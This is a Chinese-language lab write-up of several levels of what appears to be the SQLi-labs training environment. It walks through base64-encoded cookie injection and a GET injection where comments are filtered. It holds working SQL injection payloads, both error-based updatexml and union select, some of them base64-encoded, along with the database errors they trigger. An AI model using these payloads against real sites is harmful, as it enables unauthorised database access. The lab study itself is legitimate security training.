输入admin 1成功登录后显示http信息
根据提示对Cookie进行注入,输入都无果,看到YWRtaW4=并不是我们输入的admin,但是发现后面后有=,为base64编码特征,解码后发现为admin,
思路:输入1'进行编码,MSc= 出现错误
MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
闭合为')采用报错注入
MScpIG9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCkpLDEpLS0gLQ==
base64编码地址:https://c.runoob.com/front-end/693/
与上一题一样,采用base64编码
输入1"即MSI=报错
MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1
闭合为",采用报错注入
MSIgb3IgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSksMSktLSAt
这一关又回到了get请求
输入?id=1'报错
MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
闭合为 ' 但是将前面的单引号闭合之后,后面的单引号注释不掉,输入注释符显示
MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
这里猜测注释符被过滤掉了,查看源码也验证了这一点
order by也不能使用了,所以只能用-1 union select 1,2,3 or '1'='1不断加数字来获得显示位,为3是成功显示
在显示位2可以进行查询
?id=-1' union select 1,database(),3 or '1'='1
这里也可以使用报错注入
?id=1' or updatexml(1,concat(0x7e,database()),1) or '1'='1